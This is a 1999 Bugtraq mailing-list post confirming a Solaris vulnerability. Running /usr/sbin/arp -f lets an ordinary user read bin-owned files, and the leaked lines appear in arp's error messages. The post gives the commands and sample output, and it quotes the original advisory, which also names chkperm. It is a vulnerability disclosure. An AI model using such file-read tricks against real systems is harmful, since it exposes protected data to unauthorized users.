|
Bugtraq
mailing list archives
Re: Solaris 2.x chkperm/arp vulnerabilities
From: lwcashd () BIW COM (Larry W. Cashdollar)
Date: Wed, 1 Dec 1999 14:18:53 -0500
Arp bug Verified for my Solaris 5.6 and 5.5.1 Installs.
$ uname -a
SunOS pangea 5.5.1 Generic_103640-26 sun4u sparc SUNW,Ultra-5_10
# uname -a
SunOS vapid 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-5_10
#
$ ls -l /etc/bin
-rw-rw---- 1 bin bin 23 Dec 1 13:54 /etc/bin
On both machines I could read bin:bin owned files as a regular joe user with arp
-f.
bash-2.00$ /usr/sbin/arp -f /etc/bin
arp: ze: unknown host
arp: ze: unknown host
arp: zeperliz: unknown host
arp: zeperliz: unknown host
arp: zeperliz: unknown host
arp: zeperliz: unknown host
arp: zeperliz: unknown host
arp: ze: unknown host
arp: zeperl: unknown host
arp: bad line: zeperlizinzeliver
As you can see arp will only print until the first white space or newline.
# cat /etc/bin
ze perl iz in ze liver
ze perl iz in ze liver
zeperliz in ze liver
zeperliz in ze liver
zeperliz in ze liver
zeperliz in ze liver
zeperliz in ze liver
ze perl iz in ze liver
zeperl iz in ze liver
zeperlizinzeliver
zeperl iz in ze liver
ze perl iz in ze liver
Brock wrote:
Greetings,
OVERVIEW
/usr/vmsys/bin/chkperm and /usr/sbin/arp can be used to read bin-owned files.
BACKGROUND
All my testing was done on Solaris 2.7 and 2.6 SPARC edition.
Vuln #2 - arp
Just as the first, you may read any bin owned files:
bash-2.02$ ls -la /etc/bin
-rw-rw---- 1 bin bin 45 Nov 15 16:44 /etc/bin
bash-2.02$ cat /etc/bin
cat: cannot open /etc/bin
bash-2.02$ /usr/sbin/arp -f /etc/bin
arp: bad line: seekret1
arp: bad line: seekret2
arp: bad line: seekret3
arp: bad line: seekret4
arp: bad line: seekret5
Larry W. Cashdollar R2D2 r00t3d the death star.
http://vapid.dhs.org
 By Date 
By Thread
Current thread:
| 
Intro
